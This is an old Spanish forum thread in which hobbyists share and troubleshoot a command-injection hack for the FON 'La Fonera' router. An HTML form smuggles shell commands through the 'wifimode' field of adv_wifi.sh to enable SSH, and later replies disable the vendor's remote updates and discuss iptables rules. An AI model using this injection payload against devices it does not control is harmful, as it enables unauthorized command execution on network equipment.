Foros » Redes » WiFi » FON

63 respuestas
53 mensajes

Este tema es antiguo y puede contener información obsoleta. Abre un nuevo tema para publicar tu mensaje.

  • Cerrado

    Favorito #1113750

    Nuevo hack La Fonera para ejecutar código

    Para activar el acceso SSH a la fonera por ejemplo, o ejecución de código, ha aparecido otro hack.

    <html>
    <head>
    </head>
    <body>
    <center>
    <form method="post" action="http://192.168.10.1/cgi-bin/webif/adv_wifi.sh" enctype="multipart/form-data">
    <input name="wifimode" value="cat /proc/cpuinfo" size="68" >
    <input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
    </form>
    </body>
    </html>

    Copiando este código HTML a un fichero en tu disco, y abriéndolo en el navegador aparece un formulario donde se puede escribir los comando a ejecutar en La Fonera. Al pulsar enviar solicita el nombre de usuario (admin) y password de administración de la fonera, y tras ello ejecuta ejecuta el comando.

    El comando para abrir el firewall es:
    /usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT

    Y activar el servidor SSH dropbear:
    /etc/init.d/dropbear

    Para que todo vaya de una vez:
    /usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT && /etc/init.d/dropbear

    Para que se inicie por defecto el SSH y otros cambios para que no se parchee desde FON y puedan desactivar el SSH de nuevo, en la web del primer hack de hace varias semanas tenéis como hacerlo: http://stefans.datenbruch.de/lafonera/

    Más en este link Foro firmware DD-WRT

    PD: Yo ya que lo tenía abierto el SSH con el bug anterior de inyección en la web de FON, lo he probado con un comando simple y ha funcionado. Si hay algún problema, decidlo!!!

      • Favorito #1113778

        Cerrado

        Sí, ya que el acceso al entorno de administración por defecto…

        Sí, ya que el acceso al entorno de administración por defecto sólo es posible desde la red privada, sólo se puede hacer desde ella.

        Además te pide el usuario (admin) y password de administración de la fonera

        Orange 6Mbps/512kbps, sincronía ~ 5600kbps/896kbps
        Yacom Total 20Mbps/1024kbps, sincronía ~ 11500kbps/700kbps

        6
        Responder
        santito

    • Favorito #1113962

      Cerrado

      ¿Lo habéis probado? Yo he probado con las dos sentencias por…

      ¿Lo habéis probado?

      Yo he probado con las dos sentencias por separado:

      /usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT
      /etc/init.d/dropbear

      Y nada.

      Luego he probado con la conjunta:

      /usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT && /etc/init.d/dropbear

      Y adios Fonera. Ya no arranca ningún señal Wifi, ni ya puedo acceder con un cable directo, ni nada. Voy a resetearla.

      • Favorito #1113978

        Cerrado

        Yo como ya tengo abierto el puerto para SSH y ejecutándose el…

        Yo como ya tengo abierto el puerto para SSH y ejecutándose el dropbear, no lo he probado con esos comandos específicamente, pero sí ejecutando un "touch /tmp/prueba" y funciona correctamente. Voy a probar a cerrar el puerto y parar el dropbear a ver y ejecutarlos mediante el script web.

        • Favorito #1113992

          Cerrado

          La he reseteado, que susto, todo vuelve a la normalidad, pero…

          La he reseteado, que susto, todo vuelve a la normalidad, pero nada, por más que lanzo las dos secuencias no cambia nada.

          Aplico la primera, y se queda en la pantalla del panel de la Fonera, "Advanced Wireless Settings", y luego vuelvo a lanzar la segunda, pero nada, no se abre puerto alguno.

          Es raro, en los foros DD-WRT dicen que les ha funcionado con la 0.7.0 rev.4, la misma que tengo yo también.

          • Favorito #1114000

            Cerrado

            Qué panel de la Fonera? Si no tiene que salir nada de la web…

            Qué panel de la Fonera? Si no tiene que salir nada de la web de configuración, mas que la ventana de diálogo donde te pide el usuario y password para hacer login en la fonera.

            • Favorito #1114023

              Cerrado

              Si, me pide usuario y password, pero luego no vuelve al…

              Si, me pide usuario y password, pero luego no vuelve al formulario, sino al panel de control de La Fonera, a la pagina /cgi-bin/webif/adv_wifi.sh (Advanced Wireless Settings).

        • Favorito #1113995

          Cerrado

          Me respondo a mí mismo, ya lo he probado, cerrando con…

          Me respondo a mí mismo, ya lo he probado, cerrando con iptables el 22 y ejecutando killall dropbear, he pasado por el formulario el comando

          /usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT && /etc/init.d/dropbear

          todo en una línea y todo ha vuelto a vivir, puerto abierto y servidor dropbear ejecutándose de nuevo.

          Así que reiniciala La Fonea y prueba de nuevo, a mi creo que la primera vez que lo he probado se ha ido a cascarla por cualquier cosa de la vida, pero no tiene nada que ver siempre que no ejecutes algún comando que la líe ;-)

          Suerte

            • Favorito #1114004

              Cerrado

              No, no, claro que no, ese comando solo es temporal hasta el…

              No, no, claro que no, ese comando solo es temporal hasta el reseteo, cuando tienes acceso ssh para hacerlo permanente tienes que poner el dropbear en el script de inicio (cp /etc/init.d/dropbear /etc/init.d/S50dropbear) y en el fichero /etc/firewall.user añadir esto siguiente para que permita conexiones al puerto 22 del SSH

              iptables -t nat -A prerouting_rule -i $WAN -p tcp --dport 22 -j ACCEPT
              iptables -A input_rule -i $WAN -p tcp --dport 22 -j ACCEPT

              Y a enredar

              • Favorito #1114013

                Cerrado

                OK, ya la última pregunta. ¿Tienes las 0.7.0 rev.4? Es…

                OK, ya la última pregunta.

                ¿Tienes las 0.7.0 rev.4? Es posible que si tenemos distinta versión ya esté solucionado este bug, y por eso a mi no me funcione. Se trataría tan solo de solucionar el bug en el fichero Perl adv_wifi.sh.

                He probado con el puerto 22 y 23, y nada, ni SSH ni Telnet.

                • Favorito #1114018

                  Cerrado

                  Sí, claro, tengo la revisión 4, y no está parcheado, los…

                  Sí, claro, tengo la revisión 4, y no está parcheado, los scripts de update de la fonera no llevan nada.

                  Algo estás haciendo mal. ¿Tienes la fonera con IP por DHCP? ¿O la tienes con IP estática?

                  Simplemente copia y pega el código HTML (cuidado con que no se corten las líneas o algo al pegarlas, no debería) en el bloc de notas o editor de texto, y guárdalo como prueba.html. En el explorador de archivos correspondiente haz doble click, se te abre una web en blanco on un sólo recuadro del formulario donde ya hay algo rellenado por defecto (será cat /proc/cpuinfo) lo borras y pegas la línea de comando siguiente

                  /usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT && /etc/init.d/dropbear

                  y le das a enviar. Esperas unos sengundos y saldrá un error de salida el contenido de un shell script. Y estará funcionando el ssh.

                  Dale duro que algo raro tienes que estar haciendo

                  • Favorito #1114044

                    Cerrado

                    La tengo por DHCP, pero he probado también conectándola…

                    La tengo por DHCP, pero he probado también conectándola directamente por cable (y cambiando lógicamente en el html la IP por la necesaria para acceder por cable).

                    Todo es igual a lo que dices, salvo cuando pongo el comando y le doy a enviar. Entonces, el navegador piensa un poco y a continuación en lugar de dar el error, me deja en la pantalla que te comentaba anteriormente de la configuracion de la fonera /cgi-bin/webif/adv_wifi.sh (Advanced Wireless Settings)

                    Además, me deja en esa página poniendo "Advanced Wireless Settings: Settings saved" , Settings Saved: es decir, que realmente ha cogido lo que he puesto en el formulario y ha lanzado el script Perl en cuestion grabándolo.

                    No se, me dá la sensación que algo tengo diferente... ¿Habrá actualizado algo FON en mi router... no creo?

                  • Favorito #1114045

                    Cerrado

                    Hola, A mi tampoco me funciona, he revisado y tengo el…

                    Hola,

                    A mi tampoco me funciona, he revisado y tengo el firmware 0.7.0 r4
                    He hecho los pasos que dabais, sin dejarme nada
                    1-copiar el codigo html a un archivo
                    2-abrirlo en en navegador, pegar en el formulario exactamente "/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT && /etc/init.d/dropbear"
                    3-enviar
                    4-me pide usuario y contraseña, se los pongo
                    5-me empieza a cargar la página de Advanced Wireless, y luego me desconecta de la wifi !!!

                    Alguna sugerencia?

                    saludos

                    ---

                    edito para añadir que también lo he probado por cable, aunque no he tenido tiempo de verificar
                    Me da la impresión que ese boquete lleva tapado hace dias, y solo puede usarse para foneras recien sacadas de la caja (a los que no nos funciona nos habran parcheado silenciosamente el script)

                      • Favorito #1114059

                        Cerrado

                        Así lo he hecho por cable, creando un archivo especifico,…

                        Así lo he hecho por cable, creando un archivo especifico, aunque en ese caso no me dejaba entrar porque tenia configurada la IP de ethernet en la fonera como estática.

                        Intentaré probarlo más tarde, de momento la desconectaré no sea que estos chicos de fon trabajen los sabados por la noche

                        saludos

                        • Favorito #1114068

                          Cerrado

                          Tiene toda la pinta, aunque tengamos la 0.7.0 rev.4, hemos de…

                          Tiene toda la pinta, aunque tengamos la 0.7.0 rev.4, hemos de tener en cuenta que FON puede entrar en nuestro router cuando le venga en gana, y quizá ya han parcheado este tema.

                          Supongo que aunque la reseteemos no conseguiremos nada.

                            • Favorito #1114076

                              Cerrado

                              Pero me extraña que estén hoy trabajando. Además, cuando he…

                              Pero me extraña que estén hoy trabajando.

                              Además, cuando he ido a probar este tema la tenía apagada desde hace 2 días, y solo la he tenido conectada a Internet unos minutos... supongo que lo justo para parchearla.

                              • Favorito #1114092

                                Cerrado

                                La única manera a priori que se me ocurre para comprobar es…

                                La única manera a priori que se me ocurre para comprobar es la siguiente:

                                Conseguir el fichero /www/cgi-bin/webif/adv_wifi.sh de La Fonera, pero de alguien que ya tuviera acceso por SSH (por lo métodos antiguos), y que teóricamente FON ya le haga parcheado este fichero corregido.

                                Luego, ese fichero habría que comparlo con el que tiene Freddy colgado http://fon.freddy.eu.org/fonera/fon-0.7.0-rev4/www/cgi-bin/webif/

                                Y ver si es verdad que algo a cambiado...

                                Y todo esto son suposiciones de una Sábado por la tarde, resfriado, y sin poder salir a tomar unas cervecitas.

                                • Favorito #1114277

                                  Cerrado

                                  Soy el de antes. Ya he podido probar ese código y me…

                                  Soy el de antes. Ya he podido probar ese código y me funciona. Sale un mensaje de error (el html sin parsear con varias líneas que pone permission denied) y luego ya puedes acceder vía ssh. Si necesitas algo dímelo.

                    • Favorito #1114357

                      Cerrado

                      Lo acabo de probar de nuevo, configurando la IP de la fonera…

                      Lo acabo de probar de nuevo, configurando la IP de la fonera por DHCP, para poder acceder despues del reinicio a 169.254.255.1...

                      Y nada, en este caso la eth0 no pierde la conexión, pero el resultado es como si se hubiera tragado la página, ni código de script en pantalla ni nada

                      Seguiremos intentando...

    • Favorito #1114360

      Cerrado

      efectivamente funciona BusyBox v1.1.3 (2006.08.17-19:56+0000)…

      efectivamente funciona

       BusyBox v1.1.3 (2006.08.17-19:56+0000) Built-in shell (ash)
      
 Enter 'help' for a list of built-in commands.
      
 
      
 _______ _______ _______ 
      
 | ____|| || _ |
      
 | ____|| - || | | |
      
 | | |_______||__| |__|
      
 |___|
      
 
      
 Fonera Firmware (Version 0.7.0 rev 4) -------------
      
 * 
      
 * Based on OpenWrt - http://openwrt.org
      
 * Powered by FON - http://www.fon.com
      
 ---------------------------------------------------

    • Favorito #1114383

      Cerrado

      Hola, tras muchas pruebas, me he dado cuenta que el código…

      Hola,

      tras muchas pruebas, me he dado cuenta que el código html que ha pegado el autor del post no es correcto, o al menos en mi caso no se lo tragaba el Firefox o la Fonera...

      Finalmente he comparado la versión colgada por el autor del post con la versión que se posteó el día 16 en http://www.dd-wrt.com/phpBB2/viewtopic.php?t=5083&postdays=0&postorder=asc&start=90

      El fallo está al pegar el código directamente, el weblog de bandaancha lo interpreta como codigo html y sustituye los dos & q u o t por "

      Happy Hacking ...

      • Favorito #1114741

        Cerrado

        Que grande eres, quiero un hijo tuyo :-P Al final lo he…

        Que grande eres, quiero un hijo tuyo :-P

        Al final lo he conseguido, como dice elchavaldelapeca, y mira que alguien dijo que verificáramos el html a ver si estaba igual, pero yo estaba cegado en otros temas.

    • Favorito #1114408

      Cerrado

      que es ssh? hay algun comando para solucionar el problema de…

      que es ssh?
      hay algun comando para solucionar el problema de que desde la red de fuera pueden acceder al cablemodem?
      con algo de iptables no se podria denegar el acceso a la ip 192.168.100.1?
      como se haria?
      saludos

        • Favorito #1118472

          Cerrado

          este comando se puede meter directamente desde el hack html o…

          este comando se puede meter directamente desde el hack html o tiene que ser por narices en el cliente ssh?

      • Favorito #1114651

        Cerrado

        iptables -I FORWARD 1 -d 192.168.100.1 -j DROP si lo pones en…

        iptables -I FORWARD 1 -d 192.168.100.1 -j DROP

        si lo pones en el archivo /etc/firewall.user se ejecutará cada vez que arranques el trasto.

        Por cierto, editad el archivo /bin/thinclient con vi y comentad la última línea (poniendo un # delante de ". /tmp/.thinclient.sh") que si no os pueden actualizar la fonera y joder el invento en cualquier momento

        howto :p :

        vi /bin/thinclient
        3 veces a Av. pág
        i
        #
        esc
        :x

        y listo..

        • Favorito #1114726

          Cerrado

          1 me lo puedes explicar mas facil, es que de esto no tengo ni…

          1 me lo puedes explicar mas facil, es que de esto no tengo ni idea?
          ponian que solo valia hasta que se apagara la fonera.
          2 hay alguna manera de que este siempre?
          3 en caso de querer dejar la fonera como estaba por defecto se puede?
          4 alguien lo ha probado?
          5 esa ip estara prohibida para las 2 redes o solo la externa?
          6 esta prohibida paracualquier puerto?
          gracias

              • Favorito #1116168

                Cerrado

                Si ya tienes habilitado el ssh tienes que utilizar putty.exe…

                Si ya tienes habilitado el ssh tienes que utilizar putty.exe y conectar con la fonera (192.168.10.1). Nombre de ususario es root y contraseña la que tú tengas puesta (por defecto es admin)
                Una vez dentro tecleas vi /etc/firewall.user pulsas la tecla insert y podrás editar el fichero. En cualquier parte pones la línea que ha puesto luke, pero ya sabes que te impedirá el acceso desde cualquier red. No se cómo restringirlo sólo a la privada.
                Cuando hayas acabado de editar pulsas "esc" y pones ":" "x" (sin comillas) y pulsas intro (esto último guardará los cambios). Luego en la línea de comandos pones /etc/firewall.user y reiniciará el firewall con los cambios.

                Yo, de momento, lo que tengo es directamente desactivada la red pública con este comando "ifconfig ath0 down". Esta se mete directamente en la línea de comandos (esto sólo sirve hasta que reinicias el router, se podría hacer que la desactivara cada vez que reinicias, pero no tengo ganas :-) ).

                AQUI tienes un post mío de cómo abrir puertos.

                • Favorito #1116338

                  Cerrado

                  la ultima cosa. esto que has puesto queda fijo o hay que…

                  la ultima cosa. esto que has puesto queda fijo o hay que hacerlo cada vez que encendamos?
                  al pulsar el boton reset queda como estaba?
                  como tengo que hacer para dejarlo como estaba?
                  cual es el codigo que hace que no te actualicen.
                  gracias

                • Favorito #1117327

                  Cerrado

                  y para dejar la fonera como estaba? con darle al reset vale?…

                  y para dejar la fonera como estaba?
                  con darle al reset vale?
                  como se borraria los comandos nuevos?
                  saludos

    • Favorito #1117709

      Cerrado

      perfecto lo acabo de hacer y ya no se pueden conectar a mi…

      perfecto
      lo acabo de hacer y ya no se pueden conectar a mi modem con ip 192.168.100.1
      como es que si no hay acceso a esa ip si hay salida a internet?
      gracias a los 2

    • Favorito #1118377

      Cerrado

      Porque una cosa son los paquetes que se "forwadean" para que…

      Porque una cosa son los paquetes que se "forwadean" para que los rute, y otra los paquetes que tienen como destino "la ip" del router. Se tratan distinto.

          • Favorito #1118995

            Cerrado

            -I Insertar la regla en la cadena FORWARD -d La ip destino a…

            -I Insertar la regla en la cadena FORWARD
            -d La ip destino a la que se va aplicar la regla
            -j Que hacer con los paquetes que cumplan la condicion (drop=tirar)

        • Favorito #1118991

          Cerrado

          Eso es FORWARD de un paquete que entra por un interfaz y sale…

          Eso es FORWARD de un paquete que entra por un interfaz y sale por otro....

          Los paquetes que van hacia internet o cualquier sitio, la fonera les hace NAT con su ip, por lo que en realidad son paquetes que aplican a la cadena OUTPUT.

          • Favorito #1120353

            Cerrado

            no, son forward. Aunque fuera la misma interfaz TAMBIEN sería…

            no, son forward. Aunque fuera la misma interfaz TAMBIEN sería forward, porque está enrutando. Da igual que en la cadena prerouting o postrouting se haya hecho nat/masquerade.

            output e input sería en este caso para paquetes con destino FINAL la fonera y que salen de ella (de procesos de la fonera), el resto, sea el sentido que sea, va por forward

            Puedes comprobarlo en cualquier router ADSL con linux (como el comtrend):

            Chain FORWARD (policy ACCEPT 82M packets, 59G bytes)

            Por ejemplo. En un comtrend, que es el que tengo, ese contador es el de la policy por defecto, y es tráfico red->internet, porque todos los casos internet->red están cubiertos por reglas . No hay regla específica para el otro sentido (-o ppp_8_35_1) y el policy por defecto de la cadena es ACCEPT, de ahí que esos 59G sean todo saliente. No he pegado las reglas de entrante porque son muchas.. pero vamos, se ve que es forward todo.

    • Favorito #1120385

      Cerrado

      he hecho lo que decia luke pero tengo dudas si le doy a reset…

      he hecho lo que decia luke pero tengo dudas
      si le doy a reset queda como estaba?
      se puede poner algun comando temporal para que este disponible esa ip hasta que se reinicie?
      lo de deshabilitar la publica hay que hacelo por cojones en ssh o hay alguna manera de hacerlo con el codigo html?
      saludos